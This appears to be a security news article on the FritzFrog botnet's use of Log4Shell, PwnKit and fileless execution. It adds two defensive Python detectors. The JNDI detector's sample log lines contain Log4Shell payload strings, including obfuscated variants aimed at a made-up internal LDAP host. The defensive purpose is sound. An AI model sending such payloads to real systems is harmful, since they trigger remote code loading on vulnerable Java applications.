The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has returned with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network.
"The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security company Akamai said in a report shared with The Hacker News.
FritzFrog, first documented by Guardicore (now part of Akamai) in August 2020, is Golang-based malware that primarily targets internet-facing servers with weak SSH credentials. It is known to have been active since January 2020.
It has since evolved to strike the healthcare, education, and government sectors, and has improved its capabilities to ultimately deploy cryptocurrency miners on infected hosts.
What is novel about the latest version is the use of the Log4Shell vulnerability as a secondary infection vector to specifically single out internal hosts, rather than targeting vulnerable, publicly accessible assets.
"When the vulnerability was first discovered, internet-facing applications were prioritized for patching because of their significant risk of compromise," security researcher Ori David said.
"Conversely, internal machines, which were less likely to be exploited, were often neglected and remained unpatched — a circumstance that FritzFrog takes advantage of."
This means that even if the internet-facing applications have been patched, a compromise of any other endpoint (for instance, through the weak SSH credentials FritzFrog has always relied on) gives the malware a foothold from which it can reach and exploit unpatched internal Java applications that were never exposed to the internet, and so propagate further.
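The defender-side counterpart to this internal stage, as an added example that is not code from the Akamai report, is to hunt for JNDI lookups in the logs of internal Java applications rather than only at the perimeter. The Python below does that over a handful of constructed access-log lines (the addresses, paths and user agents are made up): it first collapses the nested Log4j lookups attackers use to slip past a naive `${jndi:` grep (`${lower:j}`, `${upper:n}`, `${::-l}`), then reports the scheme of each probe and the internal source address it came from. Only the evasion lookups named in the comments are emulated; that is an assumption of the example, not a complete Log4j implementation.

```python
import re

# Constructed sample access-log lines from an internal Java web app (not taken
# from the Akamai report). 10.0.4.22 plays the role of an already-compromised
# internal host probing its neighbours; the second probe is obfuscated.
SAMPLE_LOG_LINES = [
    '10.0.4.17 - - "GET /api/health HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.4.22 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://10.0.4.22:1389/a}"',
    '10.0.4.22 - - "GET /login HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://10.0.4.22:1389/a}"',
    '10.0.4.31 - - "POST /api/v1/items HTTP/1.1" 201 "curl/8.4.0"',
]

# Innermost ${...} lookup: no '$', '{' or '}' inside the braces.
_INNERMOST = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup once obfuscation has been collapsed. Log4j lower-cases the
# lookup prefix before dispatch, so 'jNdI' is as dangerous as 'jndi'.
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:', re.I)
_HOLD = '\x00'  # temporary stand-in for '$' on lookups we must leave intact


def _resolve(inner: str) -> str:
    """Emulate the Log4j 2 lookups attackers use for evasion.

    Assumption of this example: only lower:, upper: and the ':-default'
    fallback syntax are handled; anything else (jndi:, env:, date:, ...) is
    parked unchanged so the outer loop terminates.
    """
    key = inner.lower()
    if key.startswith('lower:'):
        return inner[len('lower:'):].lower()
    if key.startswith('upper:'):
        return inner[len('upper:'):].upper()
    if ':-' in inner:                      # ${anything:-value} -> value
        return inner.split(':-', 1)[1]
    return _HOLD + '{' + inner + '}'       # unresolvable: park it, restore later


def normalize(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
    return text.replace(_HOLD, '$')


def detect(line: str):
    """Return (scheme, normalized_line) if the line carries a JNDI probe, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    return (m.group(1).lower(), norm) if m else None


def scan(lines):
    """Return (index, source_ip, scheme) for every line carrying a JNDI probe."""
    hits = []
    for i, line in enumerate(lines):
        found = detect(line)
        if found:
            hits.append((i, line.split(' ', 1)[0], found[0]))
    return hits


if __name__ == '__main__':
    for i, src, scheme in scan(SAMPLE_LOG_LINES):
        print(f'line {i}: JNDI probe via {scheme} from internal host {src}')
```

The source address matters more here than it does for perimeter detection: a JNDI probe arriving from an RFC 1918 address is evidence that the neighbour is already compromised, so the alert should drive triage of the source host, not just the target application.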
The SSH brute-force component of FritzFrog has also received a facelift of its own: it now identifies specific SSH targets by enumerating several system logs on each of its victims, instead of relying purely on blind scanning.
Another notable change in the malware is the use of the PwnKit flaw tracked as CVE-2021-4034, a local privilege escalation bug in Polkit's pkexec, to gain root on hosts where the initial SSH access was unprivileged.
"FritzFrog continues to employ tactics to stay hidden and avoid detection," David said. "Specifically, it takes special care to avoid dropping files to disk when possible."
This is accomplished by means of the shared memory location /dev/shm, which has also been put to use by other Linux-based malware such as BPFDoor and Commando Cat, and of memfd_create, a system call that returns an anonymous, memory-backed file descriptor from which a payload can be executed without ever being written to the filesystem. Neither technique leaves a conventional file for disk-based scanners to find, although both remain visible through /proc for as long as the process is running.
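What those two techniques look like from /proc, and how a host-level check can pick them out, as an added example that is neither Akamai's tooling nor the malware's own code: a memfd_create() image shows up as a /proc/<pid>/exe link of the form /memfd:<name> (deleted), and anything loaded from /dev/shm carries that path in /proc/<pid>/maps. The snapshots below are constructed (PIDs, addresses and names are made up); scan_live() applies the same classification to a real /proc and, as an assumption of the example, needs root to inspect processes owned by other users.

```python
import os

# Constructed /proc snapshots for three processes (not captured from a real
# host): the target of /proc/<pid>/exe and a few lines of /proc/<pid>/maps.
SAMPLE_PROCS = {
    101: ('/usr/sbin/sshd',
          '5591c2a00000-5591c2b00000 r-xp 00000000 08:01 262401 /usr/sbin/sshd\n'
          '7f0c3d000000-7f0c3d1c0000 r-xp 00000000 08:01 131073 /usr/lib/x86_64-linux-gnu/libc.so.6\n'),
    # A payload executed from an anonymous memfd_create() file: the kernel
    # renders the exe link as /memfd:<name> (deleted) and no path exists on disk.
    202: ('/memfd:kworker (deleted)',
          '5640a1c00000-5640a1f00000 r-xp 00000000 00:01 2051 /memfd:kworker (deleted)\n'),
    # A legitimate interpreter that has loaded a shared object staged in tmpfs.
    303: ('/usr/bin/python3',
          '7f5e10000000-7f5e10021000 r-xp 00000000 00:19 44 /dev/shm/.cache/libx.so\n'),
}


def _mapped_paths(maps_text):
    """Yield the pathname column of /proc/<pid>/maps lines that have one."""
    for line in maps_text.splitlines():
        fields = line.split(None, 5)   # address perms offset dev inode [pathname]
        if len(fields) == 6:
            yield fields[5]


def classify(exe_target, maps_text):
    """Return indicator tags for one process, given its exe link target and maps."""
    tags = []
    if exe_target.startswith('/memfd:'):
        tags.append('exe-is-memfd')          # image created with memfd_create()
    elif exe_target.startswith('/dev/shm/'):
        tags.append('exe-in-dev-shm')        # binary staged in the shared-memory tmpfs
    elif exe_target.endswith(' (deleted)'):
        tags.append('exe-deleted')           # ran from disk, then unlinked itself
    if any(p.startswith('/dev/shm/') for p in _mapped_paths(maps_text)):
        tags.append('maps-dev-shm')          # code or data mapped from /dev/shm
    return tags


def triage(procs):
    """Apply classify() to a {pid: (exe_target, maps_text)} snapshot, keeping hits."""
    return {pid: tags for pid, (exe, maps) in procs.items() if (tags := classify(exe, maps))}


def scan_live(proc_root='/proc'):
    """Build the same snapshot from a live /proc and triage it.

    Assumption: run as root; unreadable or already-exited entries are skipped.
    """
    snapshot = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(base, 'exe'))
            with open(os.path.join(base, 'maps')) as f:
                snapshot[int(entry)] = (exe, f.read())
        except OSError:
            continue
    return triage(snapshot)


if __name__ == '__main__':
    for pid, tags in triage(SAMPLE_PROCS).items():
        print(f'pid {pid}: {", ".join(tags)}')
```

The check is deliberately coarse: some legitimate software (browser sandboxes, JIT runtimes, systems using memfd for sealed IPC buffers) will also trip the memfd or /dev/shm tags, so the output is a triage list to be joined with parent process, user and network context, not a verdict.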
The disclosure comes as Akamai revealed that the InfectedSlurs botnet is actively exploiting now-patched security flaws (CVE-2024-22768 through CVE-2024-22772, and CVE-2024-23842) affecting multiple DVR device models from Hitron Systems to launch distributed denial-of-service (DDoS) attacks.